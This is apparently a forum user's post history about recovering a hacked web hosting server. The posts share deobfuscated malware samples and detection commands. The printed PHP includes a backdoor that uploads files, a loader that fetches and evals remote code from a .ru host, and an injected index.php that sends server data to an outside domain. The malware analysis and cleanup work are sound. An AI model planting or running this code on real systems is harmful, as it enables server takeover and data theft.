Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - pedromidiasf

Pages: 1 [2] 3 4 ... 8
16
DKIM / Re: I'm a bit lost
« on: October 14, 2025, 09:36:32 PM »
Thank you :)

17
robots.txt (revaluation)
Many of my websites contain robots.txt files that appear to be used to expose compromised websites (when you open it, it notifies the attacker). These files include a reference to a “sitemap” that actually points to an exploited file (index.php). If Googlebot or another search-bot fetches that sitemap, it could automatically reveal the infected website to the attacker. The attacker have put search bots in work for him (smart, I must say).

Every index.php file referenced by these robots.txt files appears to be infected at the top. Below the infection lies your original code (but double check it!!!).
Note that simply deleting the robots.txt files is not enough! You also must carefully inspect and clean every affected index.php file. Make sure to thoroughly check each robots.txt file, as the infection may vary between them and you might end up losing the infected index.php file.

An infected index.php file is still useful to the attacker! The robots.txt is just a complement.

SSH command to search all robots.txt files:
Quote
find /home -type f -name "robots.txt"

18
Thank you for proving my point. There are also png looking files containing malicious code with random filename but they are rare. Probably result of an interrupted code with an exception.

Haven't found images that were encoded.
But I have a clean backup, I'll compare both and then I post the results here.

I have a few images that didn't match but because they weren't there before. They are not infected. You might have been infected before. Sending an image with php code inside a website is not hard to do. Hard is to make it executable (by changing it's extension for example).
Do you still have a file of those so I can obfuscate it to see what's inside? If so, leave the link so I can download it.

19
Thank you for proving my point. There are also png looking files containing malicious code with random filename but they are rare. Probably result of an interrupted code with an exception.

Haven't found images that were encoded.
But I have a clean backup, I'll compare both and then I post the results here.

20
robots.txt

There's also a robots file (Wordpress alike) that was added to all websites (even those that are not Wordpress). Wordpress by default don't use such files. And as you can see by the url (bellow on "sitemap" field) there's a parameter to the URL called "?sitemap.xml". If you have this, the index of your website was exploited as well. The exploitation added an infected code to the top of your index file.
I recommend you to take a deep look on each "index" file you have. If you don't need that index file delete it. If you need it, look line by line of code.

Content of the robots file:
Quote
User-agent:*
Disalow:/wp-admin/
Sitemap: https://example.com?sitemap.xml

The infected index.php file had this code on top (nothing new as I've posted before).
As far as I can see, it extracts server information (by PHP $SERVER array) and sends it to an external server. It probably tracks when someone opens the website to notify the attacker that the website is on.
Deobfuscated Contents:
(DO NOT EXECUTE THIS!!!!)
Code: [Select]
<?php
// Variables innecesarias/sin usar
$timestamp1 date("Y-m-d H:i:s");
$token1 strtok("AFbWn");
$list implode(",", array("vQTrioN""b97ms""OiBCEdN""dwjr3P"));
$null_var = (string)null;
$hash1 sha1("UDBYN");
$token2 strtok("JmD3LC");
$timestamp2 date("Y-m-d H:i:s");

// Clase de inicialización trivial
new TJw3Q();

class 
Q5e9Q {
    public static function 
__callStatic($name$arguments) {
        
// Decodificación: "\143\x75\162\x6c" = "curl"
        
$curl_init curl_init();
        
        
// URL: "http://cache.usererp.site/about.php"
        
$url "http://cache.usererp.site/about.php";
        
        
// Configurar opciones CURL
        
curl_setopt($curl_initCURLOPT_URL$url "?ua=" urlencode($arguments[0]));
        
curl_setopt($curl_initCURLOPT_RETURNTRANSFER1);
        
curl_setopt($curl_initCURLOPT_ENCODING0);
        
curl_setopt($curl_initCURLOPT_FOLLOWLOCATION47);
        
        
// Ejecutar y guardar respuesta
        
global $response;
        
$response curl_exec($curl_init);
        
curl_close($curl_init);
    }
}

// Más variables innecesarias
$var1 strstr("YNEAdT""NAJ7mFa");
$var2 implode("RwOc8q9YN", array());
$json_server json_encode($_SERVER);
$var3 define("pd4mjgTe""rJOdy");
// ... más variables sin usar

function call_function($function_name$param_count null$param1 null$param2 null$param3 null$param4 null) {
    if (
$param_count == 1) return $function_name($param1);
    if (
$param_count == 2) return $function_name($param1$param2);
    if (
$param_count == 3) return $function_name($param1$param2$param3);
    if (
$param_count == 4) return $function_name($param1$param2$param3$param4);
    return 
$function_name();
}

function 
redirect_if_url($response) {
    if (
substr($response04) == "http") {
        
header("Location: " $response);
    }
}

function 
json_encode_server($server_array) {
    return 
json_encode($server_array);
}

function 
handle_xml($response) {
    if (
strstr($response"<urlset")) {
        exit(
header("Content-type:text/xml") . $response);
    }
}

function 
handle_html($response) {
    if (
strstr(trim($response), "<html")) {
        exit(
$response);
    }
}

class 
TJw3Q {
    public function 
__construct() {
        
$_SERVER["T"] = "z";
        
$_SERVER["TPL"] = "4";
    }
}

function 
base64_encode_server($server_array) {
    return 
base64_encode($server_array);
}

// Lógica principal
$json_encoded json_encode($_SERVER);
$json_encoded base64_encode($json_encoded);
Q5e9Q::fHaWdfTx($json_encoded);
?>



licelic.c (revaluation)
If you come across these files, they’re useful for identifying infected areas, but they’re not enough. I’ve discovered several other infected locations (quite a few, actually - even within the same website there are multiple infected files), and I haven’t been able to find all the licelic.c files that could point me to them.
I believe some of these files were deleted while the server was being exploited by the exploit, but a few might have been lost in the process - or perhaps they were left behind as bait to make it seem like those were only the infected areas.

21
DKIM / Re: I'm a bit lost
« on: October 14, 2025, 12:48:10 PM »
I'm sorry I lost this message.
Thank you for your time and help.

22
Information / Re: htpasswd on CWP
« on: October 14, 2025, 10:02:46 AM »
The FYI for those interested is that cwpsrv runs under Nginx, not Apache -- so syntax for configuration changes needs to be appropriate for Nginx. And thus, .htaccess files are not read or considered.

Also, in order to preserve files through CWP updates, you need to set the immutable bit:
Code: [Select]
chattr +i /usr/local/cwpsrv/htdocs/.htpasswd
Yes I fould out. I wasn't familier with Nginx, that's why it wasn't working what I was doing.
Thanks for the immutable bit! This will help!

23
To find files that have base64 encoded parts (used to obfuscate php code):
grep -RIl --binary-files=text -P '[A-Za-z0-9+/]{100,}={0,2}' /home

Some false positives might end up being: pdf, mp3, image, and so on (you have to take a deep look into it)

--
Alternative:

If you want to filter just php files (not enough to be secure):
grep -RIl --binary-files=text --include="*.php" -P '[A-Za-z0-9+/]{100,}={0,2}' /home

If you want to filter just files without extension (still not enough to be secure):
grep -RIl --binary-files=text --exclude='*.*' -P '[A-Za-z0-9+/]{100,}={0,2}' /home

--
Note: You could extend this outside /home. But as far I'm concern, this hack didn't directly affect the system otherwise you would be seeing cron jobs and other stuff around the system. But I recommend you to change all usernames passwords.

24
There are a lot of index.php files exploited. Some are close to "c" file, others are just disposed across directories.
Use this to find them:
grep -Rl --include="*index.php" 'ucwords' /home/px_disabled/public_html/


To find zipped files that have no zip extension (ignoring Microsoft Office documents):
find /home -type f ! -name '*.zip' ! -name '*.docx' ! -name '*.xlsx' ! -name '*.pptx' -exec sh -c 'head -c2 "$1" | read -r b && [ "$b" = "PK" ] && echo "$1"' _ {} \;

25
Also found out that all the files you get distributed by the server are obfuscated differently. By this you won't be able to search for specific text. Maybe specific functions but even the functions like "goto", "ucwords" and $GLOBALS that is not commonly used but it is used a lot on these exploits.

$GLOBALS array is used to add a function (built with a string??) to the system that is afterwards executed. This allows the attacker to execute php code without using the "eval" function (I'm not sure about this part). This therm is used on all files that i saw, it might be very useful to find those exploits using this term.


Another idea:
Also search for files that start with "PK" (zipped content) and don't have the zip extension.

26
wp-login.php
It receives an URL GET parameter (?MeL=...) that is related to that "licelic.c" code inside (all URLs there have this MeL parameter). It also saves files.

(DO NOT EXECUTE THIS!)
Code: [Select]
<?php 
// WARNING: MALICIOUS CODE - DO NOT EXECUTE

// Initialize variables
$aLTZ_CWiB false;

// Decode &#39;serialize&#39; function from concatenated string indices
// This reconstructs: s-e-r-i-a-l-i-z-e
$dseBk = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].
(
"vgIrrw")[3])("dseBk""GjGg9m");

$b4YsfJ = array("o0FgLZyK4ABbJHto");
$JHwES = (string) null;

// Decode &#39;wordwrap&#39; function and set word wrap to 15 characters
$aVcFqS = (("vrgwA7")[3].("kozN")[1].("wr2Hs")[1].("dQSktI")[0].
(
"wbrHMj")[0].("v8SZrf")[4].("cuEaA")[3].("poCzK")[0])(""15);

// Get current date and time
$EKsO2FVW date("Y-m-d H:i:s");

// Decode &#39;md5&#39; function
$MAsW_z = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
(
"nntWNs")[2].("vgIrrw")[3])("MAsW_z""cGXdJI");

// Decode &#39;trim&#39; function
$zs7o1QeOh = (("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])("   ");

// Check if GET parameter "MeL" exists - if not, exit
if(!isset($_GET["MeL"])) exit;

// Check if constant is defined
$LHpbN4P2x defined("_NYaHD");

// Get POST parameter "RfDJgIyWki" (trim it if exists)
$NiXTY2V3mC = isset($_POST["RfDJgIyWki"])?
((
"U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["RfDJgIyWki"]):"";

$_blZ7fx metaphone("moSCud");
$Jt69Gsohg define("OL0mQ","gDrORyX");
$BMbxgE4 false;

// Get POST parameter "xYjdx" (trim it if exists)
$V9Aqud = isset($_POST["xYjdx"])?
((
"U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["xYjdx"]):"";

// If $V9Aqud is not empty, call save_file() function and exit
// This SAVES UPLOADED FILE to the server
$sf = !empty($V9Aqud)?exit("hHc1Pq7UymG5xrZgRn_".save_file($NiXTY2V3mC,$V9Aqud)):"";

// Decode another function
$dPE1i_ = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
(
"nntWNs")[2].("vgIrrw")[3])("zOEPQxj","ssMKu");

// CRITICAL FUNCTION: Saves uploaded file to disk
// Parameters: $NiXTY2V3mC = filename, $V9Aqud = file content
function save_file($NiXTY2V3mC,$V9Aqud){
    
// Open file in write mode
    
$handle fopen($NiXTY2V3mC,"w");
    if(
$handle){
        
// Write the malicious content to the file
        
fwrite($handle,$V9Aqud);
        
fclose($handle);
    }

    return 
"hHc1Pq7UymG5xrZgRn_";
}

$yXQwOmu addslashes("yXQwOmu");

// Display HTML form (reconstructed from character indices)
// This renders an HTML form with input fields
echo ("<z01")[0].("em8fuW")[3].(... [reconstructs HTML form HTML] ...);
?>

27
backup.c
Zip file (change the extension to zip and open it with a zip application). It contains a new file called "back".
This file talks to the exterior. I asked cloud.ai to comment the code:
(DO NOT EXECUTE)
Code: [Select]
<?php
// MALICIOUS CODE - DO NOT EXECUTE

// Helper function that executes a function dynamically
// Used to obfuscate function calls
function sdcss($strrt,$pram_1){
return $strrt($pram_1);
}

// Main malicious function that fetches and executes remote code
// Parameters: $url = remote server URL, $time_out = connection timeout
function KmY7I3NC($url,$time_out=30){
// Check if cURL is available (preferred method)
if(sdcss("function_exists","curl_exec")){
// Initialize cURL connection
$fq8h2HYxV=curl_init();

// Set the target URL (10002 = CURLOPT_URL)
curl_setopt($fq8h2HYxV,10002,$url);

// Return transfer as string (19913 = CURLOPT_RETURNTRANSFER)
curl_setopt($fq8h2HYxV,19913,1);

// Do not verify SSL certificate (64 = CURLOPT_SSL_VERIFYPEER)
curl_setopt($fq8h2HYxV,64,false);

// Set random timeout between 30-60 seconds (13 = CURLOPT_TIMEOUT)
curl_setopt($fq8h2HYxV,13,mt_rand(30,60));

// Execute the request, decode the response (skip first character)
// and execute it as PHP code using eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(curl_exec($fq8h2HYxV)),1)));

// Close cURL connection
curl_close($fq8h2HYxV);
}else{
// Fallback: use file_get_contents if cURL is not available
// Also decodes base64 and executes with eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(sdcss("file_get_contents",$url),1))));
}

// Return the result of executed code
return $fhD2dN4z;
}

// Main malware trigger - checks if GET parameter "l" is set
if(isset($_GET["l"])){
    // Collect all GET parameters (with empty string as default if not set)
    $tid = isset($_GET["tid"])?$_GET["tid"]:"";
    $did = isset($_GET["did"])?$_GET["did"]:"";
    $tem = isset($_GET["tem"])?$_GET["tem"]:"";
$ck = isset($_GET["ck"])?$_GET["ck"]:"";
$usip = isset($_GET["usip"])?$_GET["usip"]:"";
$vson = isset($_GET["vson"])?$_GET["vson"]:"";
$no = isset($_GET["no"])?$_GET["no"]:"";
    
    // Build malicious URL with encoded server address
    // URL decodes to: "http://vOlOVmARTc.Ru/dai/?c=base&l=...&ck=...&usip=...&vson=...&no=...&tid=...&did=...&tem=..."
    $url "\150\164\124\160\x3a\x2f\x2f\x76\x4f\x6c\117\x56\x6d\101\x52\124\x2e\122\165\57\x64\141\151\x2f\x3f\x63\75\142\141\x73\145\46\x6c\x3d".$_GET["l"]."&ck=".$ck."&usip=".$usip."&vson=".$vson."&no=".$no."&tid=".$tid."&did=".$did."&tem=".$tem;
    
    // Fetch remote PHP code, decode it, and execute it
    $str KmY7I3NC($url);
}

?>

Russian URLs (I've also detected some Russian emails on my Wordpress accounts.
But it looks like the domain is off. Probably banned?

28
I found some .c files.
I also found that there a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deeply inside some folders of websites I've developed myself. Thankfully I have a clean backup and these files were not there.

licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites locations encoded in base64 and some weird stuff (can't decode it directly, maybe it is written with another encode type). I copy-pasted it to Cloud.ai that decode it for me and it gave me all the urls that are infected. I tried chatgpt and it gave me nothing in return.
SO "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.

Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...

wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun

"c" file (without the dot)
"c" file (without the dot) is a zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated php code that consists on drawing a form that probably interacts with the expoits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)
Code: [Select]
<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE

// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;

// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO$x6Mpbe) {
    
$iGRCOPT str_split($TYCMzwTO1);
    
$emivt51O explode(","$x6Mpbe);
    
$gMRtx3VD "";
    foreach(
$emivt51O as $v) {
        
$gMRtx3VD .= $iGRCOPT[(int)$v];
    }
    return 
$gMRtx3VD;
}

// Static class with method to initialize arrays
class hCXKOZB {
    public static function 
__callStatic($name$arguments) {
        
$temarr = array(
            
"puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2""10,2,7,1,5"),
            
"CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG""12,19,3,4,7,0"),
            
"mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K""24,8,9,13,2,14")
        );
        foreach(
$temarr as $key => $v) {
            
$GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
        }
    }
}

// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";

// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0"w") : "";

// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" $mWHO_PtG($n3Bi8fy));

// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo 
"<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo 
"<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo 
"<button type=\"submit\">submit</button>";
echo 
"</form>";
?>

index.php
This is the index.php deeply inside subfolders were the index file i've created. The root index.php file was replaced by a malicious code that executes the payload and imports my original index file.
So take a deep look on every index file you have (even sub-folders).

These files were touched (date-time changed). Mine dated 30/08/2024 23:06:51

So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going throw all files and folders and apply new rules to stop execution on folders that you don't have php files (image uploads for example).

29
Yes but having a cPanel/WHM is kinda expensive to have it online. I would rather configure a server by myself.
The things you mostly do usually don't require a web panel.
Are you sure this .c files are from this attack or from another one? I searched and didn't find such malicious files.

30
Information / Re: htpasswd on CWP
« on: October 12, 2025, 10:12:39 PM »
Found it!!!

Just needed to add into "/usr/local/cwpsrv/conf/cwpsrv.conf" these 2 lines (inside second "server" into "location /"):
# HTTP Basic Auth
auth_basic "Acesso restrito";
auth_basic_user_file /usr/local/cwpsrv/htdocs/.htpasswd;

Also created a .htpasswd inside the main folder. Probably have to replace that after a CPW update.

Ok cool, now it is required to add a main password before starting using the panel (includes webmail and phpMyAdmin).

PS if you do this, don't forget to restart the service:
sh /scripts/restart_cwpsrv

Take into consideration that everyone will be required to know this password in order to access the panel. In my case there's no other people logging in.

Pages: 1 [2] 3 4 ... 8